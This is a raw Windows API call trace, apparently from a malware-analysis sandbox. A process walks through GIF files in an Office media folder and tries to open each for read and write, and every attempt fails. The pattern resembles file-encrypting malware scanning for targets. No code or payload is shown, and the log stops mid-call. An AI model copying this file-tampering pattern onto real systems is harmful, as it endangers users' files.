SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21312_.GIF", dwFileAttributes=0x80) returned 0 [0135.907] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21312_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21312_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.907] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.907] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.907] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.907] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.907] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21314_.GIF", dwFileAttributes=0x80) returned 0 [0135.908] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21314_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21314_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.908] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.908] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.908] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.908] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.909] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21316_.GIF", dwFileAttributes=0x80) returned 0 [0135.909] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21316_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21316_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.909] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.909] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.909] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.909] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.909] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21327_.GIF", dwFileAttributes=0x80) returned 0 [0135.910] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21327_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21327_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.910] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.910] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.910] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.910] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.910] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21329_.GIF", dwFileAttributes=0x80) returned 0 [0135.910] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21329_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21329_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.911] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.911] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.911] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.911] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.911] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21331_.GIF", dwFileAttributes=0x80) returned 0 [0135.911] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21331_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21331_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.912] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.912] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.912] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.912] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.912] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21333_.GIF", dwFileAttributes=0x80) returned 0 [0135.912] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21333_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21333_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.912] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.912] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.912] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.912] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.913] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21335_.GIF", dwFileAttributes=0x80) returned 0 [0135.913] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21335_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21335_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.913] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.913] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.913] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.913] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.914] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21337_.GIF", dwFileAttributes=0x80) returned 0 [0135.914] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21337_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21337_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.914] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.914] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.914] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.914] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.914] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21339_.GIF", dwFileAttributes=0x80) returned 0 [0135.915] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21339_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21339_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.915] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.915] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.915] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.915] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.915] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21342_.GIF", dwFileAttributes=0x80) returned 0 [0135.915] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21342_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21342_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.915] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.915] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.916] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.916] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.916] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21343_.GIF", dwFileAttributes=0x80) returned 0 [0135.916] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21343_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21343_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.916] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.916] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.916] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.916] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.916] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21344_.GIF", dwFileAttributes=0x80) returned 0 [0135.917] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21344_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21344_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.917] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.917] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.917] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.917] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.917] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21364_.GIF", dwFileAttributes=0x80) returned 0 [0135.917] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21364_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21364_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.918] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.918] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.918] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.918] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.918] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21365_.GIF", dwFileAttributes=0x80) returned 0 [0135.918] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21365_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21365_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.918] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.918] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.918] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.918] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.919] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21366_.GIF", dwFileAttributes=0x80) returned 0 [0135.919] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21366_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21366_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.919] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.919] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.919] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.919] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.920] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21375_.GIF", dwFileAttributes=0x80) returned 0 [0135.920] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21375_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21375_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.920] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.920] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.920] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.920] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.920] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21376_.GIF", dwFileAttributes=0x80) returned 0 [0135.920] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21376_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21376_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.920] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.920] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.920] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.920] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.921] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21377_.GIF", dwFileAttributes=0x80) returned 0 [0135.921] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21377_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21377_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.921] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.921] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.922] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.922] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.922] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21398_.GIF", dwFileAttributes=0x80) returned 0 [0135.922] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21398_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21398_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.922] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.922] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.922] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.922] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.922] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21399_.GIF", dwFileAttributes=0x80) returned 0 [0135.922] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21399_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21399_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.923] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.923] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.923] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.923] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.923] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21400_.GIF", dwFileAttributes=0x80) returned 0 [0135.923] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21400_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21400_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.924] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.924] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.924] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.924] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.924] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21421_.GIF", dwFileAttributes=0x80) returned 0 [0135.924] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21421_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21421_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.924] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.924] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.924] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.924] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.925] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21422_.GIF", dwFileAttributes=0x80) returned 0 [0135.925] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21422_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21422_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.925] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.925] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.925] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.925] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.925] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21423_.GIF", dwFileAttributes=0x80) returned 0 [0135.926] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21423_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21423_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.926] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.926] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.926] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.926] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.926] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21433_.GIF", dwFileAttributes=0x80) returned 0 [0135.926] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21433_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21433_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.926] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.926] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.926] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.927] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.927] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21434_.GIF", dwFileAttributes=0x80) returned 0 [0135.927] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21434_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21434_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.927] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.927] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.927] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.927] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.927] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21435_.GIF", dwFileAttributes=0x80) returned 0 [0135.928] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21435_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21435_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.928] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.928] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.928] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.928] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.928] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21480_.GIF", dwFileAttributes=0x80) returned 0 [0135.928] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21480_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21480_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.928] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.928] VirtualFree (lpAddress=0x350000, 